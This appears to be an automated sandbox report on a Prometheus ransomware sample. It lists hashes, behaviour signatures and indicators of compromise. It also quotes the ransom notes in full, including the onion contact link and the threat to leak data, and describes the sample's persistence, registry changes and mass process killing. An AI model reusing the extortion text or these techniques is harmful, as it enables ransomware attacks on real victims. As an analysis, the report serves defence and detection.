prometheus | 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc

Analysis

max time kernel
118s
max time network
52s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 06:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Size

233KB
MD5

96c565af56a5ba8339f35121bf9ff196
SHA1

2edae92d476225b00b4a7ea1e9d7f7ccfda462cb
SHA256

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc
SHA512

6d4a3d91396bccae3dff43f6ee295980c1919a48f7914d9b8b6eca3e603aa97b8e05a0b78af27e7f1c86691fff6fc26fad69ddb774f8ed5d8011aa87b511b6c1

Score

10^/10

prometheus evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM and paste it in the Tor browser. c. Start a chat and follow the further instructions. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: lmjsYi45FeI8JlfNqcXBmBuQNFVdBGLvfXs3a9aZMC9HdSAUPCjFgF5KWj75mMcPgJ1rGdtwp1wOM5Bur8f3fnaVb03saxWG16YEj6MrquLHlqHv7MGl/O8XeNhcBci1XGi+wI9BzSkr0YHfOjEBXouvhNlVcnkxPhwho+mEmI0f12TpoiVoFSopmM1NK8ZcZimuhcl6sVwNX4rFf9NZGxN729nbPZuwrt2NxjOl7wbuPXVMR8Lf1v29TcaCx3/lit5abmmFgJE0rI9Q/Sx11UOYXcjXWgpTs+dst1xmoajgia/Gf4tp3tSOXHJMdbph2GseTMTuNQOVuP6zKflNJ5VEcj3H5zXs7HrZw2w8b5giAZnu6eKu+xTjXSxIDK76tBTPc9NABiG0pTDjZVGROWIq8oKmvd46hgvqx7ISvfdlBwllXNvkAJd4zJFBi16PfS8LsmWjdhjHMltpemJMcN74sGmQ5QdK09iPdlFydYC56lHjTXKDWGz0guI/Hnw6W7ZD7wF5D2cqsw0HEYc/We/RRLw+TLdeWARhQBKAXzawlTFmAhbu6e5qH3nj++xGIARZG0r74pHodbvUWf7hHEJyeSgQJXv/5qx9k7p1ASJ3otrwZiBs7KR3pyZMsngzQXgyZ4HAegQZH3HYCik7/w9pKy0V0lc6krV4Q9C1nk8=

URLs

http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM and paste it in the Tor browser. c. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: lmjsYi45FeI8JlfNqcXBmBuQNFVdBGLvfXs3a9aZMC9HdSAUPCjFgF5KWj75mMcPgJ1rGdtwp1wOM5Bur8f3fnaVb03saxWG16YEj6MrquLHlqHv7MGl/O8XeNhcBci1XGi+wI9BzSkr0YHfOjEBXouvhNlVcnkxPhwho+mEmI0f12TpoiVoFSopmM1NK8ZcZimuhcl6sVwNX4rFf9NZGxN729nbPZuwrt2NxjOl7wbuPXVMR8Lf1v29TcaCx3/lit5abmmFgJE0rI9Q/Sx11UOYXcjXWgpTs+dst1xmoajgia/Gf4tp3tSOXHJMdbph2GseTMTuNQOVuP6zKflNJ5VEcj3H5zXs7HrZw2w8b5giAZnu6eKu+xTjXSxIDK76tBTPc9NABiG0pTDjZVGROWIq8oKmvd46hgvqx7ISvfdlBwllXNvkAJd4zJFBi16PfS8LsmWjdhjHMltpemJMcN74sGmQ5QdK09iPdlFydYC56lHjTXKDWGz0guI/Hnw6W7ZD7wF5D2cqsw0HEYc/We/RRLw+TLdeWARhQBKAXzawlTFmAhbu6e5qH3nj++xGIARZG0r74pHodbvUWf7hHEJyeSgQJXv/5qx9k7p1ASJ3otrwZiBs7KR3pyZMsngzQXgyZ4HAegQZH3HYCik7/w9pKy0V0lc6krV4Q9C1nk8=

URLs

http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM

Signatures

Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
ransomware prometheus
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description	flow	ioc
HTTP URL	11	http://live.sysinternals.com/PsExec64.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Deletes itself 1 IoCs

Processes:

cmd.exe

pid	Process
916	cmd.exe

Drops startup file 1 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
892	taskkill.exe
1248	taskkill.exe
1060	taskkill.exe
2028	taskkill.exe
284	taskkill.exe
1932	taskkill.exe
1144	taskkill.exe
1620	taskkill.exe
1964	taskkill.exe
1912	taskkill.exe
1756	taskkill.exe
756	taskkill.exe
1516	taskkill.exe
292	taskkill.exe
1432	taskkill.exe
1088	taskkill.exe
1704	taskkill.exe
1068	taskkill.exe
1012	taskkill.exe
956	taskkill.exe
1716	taskkill.exe
824	taskkill.exe
788	taskkill.exe
1596	taskkill.exe
1600	taskkill.exe
1360	taskkill.exe
436	taskkill.exe
672	taskkill.exe
1956	taskkill.exe
1612	taskkill.exe
532	taskkill.exe
1160	taskkill.exe
320	taskkill.exe
1688	taskkill.exe
776	taskkill.exe
644	taskkill.exe
860	taskkill.exe
1112	taskkill.exe
1476	taskkill.exe
1348	taskkill.exe
396	taskkill.exe
1300	taskkill.exe
572	taskkill.exe
932	taskkill.exe
992	taskkill.exe
328	taskkill.exe
1308	taskkill.exe
1540	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1052	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
1904	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

pid	Process
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	788	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	532	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	284	taskkill.exe
Token: SeDebugPrivilege	1068	taskkill.exe
Token: SeDebugPrivilege	572	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	436	taskkill.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	292	taskkill.exe
Token: SeDebugPrivilege	320	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	992	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	776	taskkill.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	644	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	268	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

pid	Process
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

pid	Process
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	pid	Process	procid_target
PID 1084 wrote to memory of 756	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	30
PID 1084 wrote to memory of 756	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	30
PID 1084 wrote to memory of 756	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	30
PID 1084 wrote to memory of 1120	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	32
PID 1084 wrote to memory of 1120	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	32
PID 1084 wrote to memory of 1120	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	32
PID 1084 wrote to memory of 1052	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	34
PID 1084 wrote to memory of 1052	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	34
PID 1084 wrote to memory of 1052	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	34
PID 1084 wrote to memory of 980	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	36
PID 1084 wrote to memory of 980	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	36
PID 1084 wrote to memory of 980	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	36
PID 1084 wrote to memory of 864	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	38
PID 1084 wrote to memory of 864	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	38
PID 1084 wrote to memory of 864	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	38
PID 1084 wrote to memory of 652	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	39
PID 1084 wrote to memory of 652	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	39
PID 1084 wrote to memory of 652	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	39
PID 1084 wrote to memory of 544	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	40
PID 1084 wrote to memory of 544	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	40
PID 1084 wrote to memory of 544	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	40
PID 1084 wrote to memory of 704	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	44
PID 1084 wrote to memory of 704	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	44
PID 1084 wrote to memory of 704	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	44
PID 1084 wrote to memory of 1728	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	46
PID 1084 wrote to memory of 1728	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	46
PID 1084 wrote to memory of 1728	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	46
PID 1084 wrote to memory of 800	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	48
PID 1084 wrote to memory of 800	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	48
PID 1084 wrote to memory of 800	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	48
PID 1084 wrote to memory of 1616	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	50
PID 1084 wrote to memory of 1616	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	50
PID 1084 wrote to memory of 1616	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	50
PID 1084 wrote to memory of 768	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	55
PID 1084 wrote to memory of 768	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	55
PID 1084 wrote to memory of 768	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	55
PID 1084 wrote to memory of 728	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	52
PID 1084 wrote to memory of 728	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	52
PID 1084 wrote to memory of 728	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	52
PID 1084 wrote to memory of 1184	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	56
PID 1084 wrote to memory of 1184	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	56
PID 1084 wrote to memory of 1184	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	56
PID 1084 wrote to memory of 824	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	57
PID 1084 wrote to memory of 824	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	57
PID 1084 wrote to memory of 824	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	57
PID 1084 wrote to memory of 1248	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	63
PID 1084 wrote to memory of 1248	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	63
PID 1084 wrote to memory of 1248	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	63
PID 1084 wrote to memory of 788	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	61
PID 1084 wrote to memory of 788	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	61
PID 1084 wrote to memory of 788	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	61
PID 1084 wrote to memory of 1708	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	64
PID 1084 wrote to memory of 1708	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	64
PID 1084 wrote to memory of 1708	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	64
PID 1084 wrote to memory of 1964	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	65
PID 1084 wrote to memory of 1964	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	65
PID 1084 wrote to memory of 1964	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	65
PID 1084 wrote to memory of 1596	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	68
PID 1084 wrote to memory of 1596	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	68
PID 1084 wrote to memory of 1596	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	68
PID 1084 wrote to memory of 860	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	69
PID 1084 wrote to memory of 860	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	69
PID 1084 wrote to memory of 860	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	69
PID 1084 wrote to memory of 1060	1084	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	72

